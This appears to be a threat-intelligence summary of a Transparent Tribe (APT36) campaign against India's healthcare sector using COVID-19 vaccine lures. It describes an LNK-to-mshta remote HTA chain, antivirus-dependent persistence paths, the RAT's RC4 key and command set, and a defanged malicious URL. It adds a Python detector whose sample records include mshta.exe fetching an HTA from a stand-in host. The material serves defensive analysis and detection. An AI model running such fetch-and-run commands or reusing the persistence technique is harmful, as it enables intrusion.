forked from LexusWang/Aurora-demos
238.txt
Transparent Tribe Targeted Attack Campaign Against Indian Healthcare Sector Leveraging COVID-19 Vaccine Hotspots
Transparent Tribe (also known as APT36, ProjectM, C-Major), a South Asian-origin APT group, has long conducted targeted attacks against political and military institutions in neighboring countries and regions. The group developed its proprietary CrimsonRAT malware and has been found spreading USB worms extensively. From late 2019 the group focused on Afghanistan, before shifting back to Indian targets around January 2020 using job-recruitment and military-themed lures. By March 2020 it had launched new campaigns against Indian and Afghan targets with electronics, defense, security and resume-related themes. Since the COVID-19 outbreak, Transparent Tribe has joined other APT groups in pandemic-themed attacks, deploying malicious documents against India in April 2020 alongside intensified USB worm attacks against Afghanistan that used previously undisclosed usbworm components. Recent monitoring by the 360 Advanced Threat Research Institute revealed new Transparent Tribe attacks that exploit COVID-19 vaccine topics to steal intelligence from India's healthcare sector. The campaign used ZIP archives containing LNK files disguised as PDFs; the LNK executes mshta.exe to load a remote HTA script from hxxps://londonkids[.]in/echoolz/assets/css/front/hwo/DATE-OF-NEXT-INCREMENT-ON-UP-GRADATION-OF-PAY-ON-01-JAN-AND-01-JUL/css. The HTA script decodes base64-encoded strings and executes the resulting code via .NET serialization, invoking a PinkAgain function to drop files, and uses WMI to enumerate installed antivirus products in order to choose the drop path. After infection, a decoy COVID-19 vaccine document hosted on Google Docs is shown to the victim. The .NET dropper adapts its payload path to the security product it detects: it writes syhostt.hta to the Startup folder when Avast or Windows Defender is present, to the MyMusic and Startup folders for Kaspersky, and to MyMusic/MyApplication for Symantec. Analysis revealed coding errors in the Unicode/ASCII conversions that prevent the RAT from executing properly unless the faulty string-decoding lines are removed.
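As an added illustration (not code from the 360 report), the following Python scans constructed process-creation records for two of the behaviours described above: mshta.exe loading an HTA from a remote URL, and an HTA run from the Startup or MyMusic persistence paths the dropper chooses between. The record format, host name and user name are assumptions.

```python
import re

# Constructed sample process-creation records (not from the report):
# "parent_image|image|command_line". Host name and paths are made up.
SAMPLE_EVENTS = [
    r"explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe https://hta-host.example/front/hwo/css",
    r'mshta.exe|C:\Windows\System32\mshta.exe|mshta.exe "C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syhostt.hta"',
    r'explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe "C:\Users\bob\Music\MyApplication\syhostt.hta"',
    r'explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe "C:\Program Files\Vendor\installer.hta"',
    r"explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt",
]

# mshta.exe given an http(s) URL: the LNK -> remote HTA stage of the chain.
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# An .hta launched from the Startup folder or the user's Music folder,
# the two persistence locations the dropper selects between.
PERSIST_PATH = re.compile(
    r"\\(Start Menu\\Programs\\Startup|Music)\\.*\.hta\b", re.IGNORECASE
)


def parse_event(record):
    """Split one 'parent|image|cmdline' record into a dict."""
    parent, image, cmdline = record.split("|", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}


def classify(event):
    """Return the rule names the event matches (empty list means no finding)."""
    hits = []
    if event["image"].lower().endswith("\\mshta.exe"):
        if REMOTE_URL.search(event["cmdline"]):
            hits.append("mshta_remote_hta")
        if PERSIST_PATH.search(event["cmdline"]):
            hits.append("hta_from_persistence_path")
    return hits


def scan(records):
    """Return [(record_number, cmdline, hits)] for every record that matches a rule."""
    findings = []
    for n, record in enumerate(records, 1):
        event = parse_event(record)
        hits = classify(event)
        if hits:
            findings.append((n, event["cmdline"], hits))
    return findings


if __name__ == "__main__":
    for n, cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"record {n}: {hits}: {cmdline}")
```

Records 1 to 3 are flagged; the vendor installer HTA in record 4 and notepad in record 5 are not, which is the kind of path-based distinction that keeps a broad mshta.exe rule from drowning in noise.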
The final RAT (distinct from CrimsonRAT and PeppyRAT) communicates with its C2 using RC4 encryption with the key "ceta" (possibly a reference to the Canada-EU CETA trade agreement). It supports the commands downloadexe, download, upload, run, delete, rename, creatdir, list, process, pkill, clipboard, clipboardset, screen, shellexec and close, and collects the list of installed AV software and the MAC address. In this campaign Transparent Tribe mimicked the TTPs of the SideWinder APT, replicating its malicious script structure and adopting the identical PreBotHta module name. Path string similarities were also observed between syhostt.hta in the current attacks and sihostt.exe from incidents in September 2020. In the ongoing India-Pakistan cyber conflict, APT groups frequently imitate one another's tactics: Transparent Tribe previously copied the macro code of Donot Team (APT-C-35) and now emulates SideWinder's patterns, complicating attribution. South Asia's volatile geopolitical situation and inadequate cybersecurity awareness allow APT activity to flourish. The recent attacks expand beyond the traditional military and political targets to the healthcare sector, under the cover of COVID-19 vaccine topics. 360 recommends enhanced security awareness, infrastructure hardening, and increased investment in defensive capabilities. The growing use of false-flag operations and TTP mimicry by APT groups poses significant challenges for accurate attribution and technical analysis.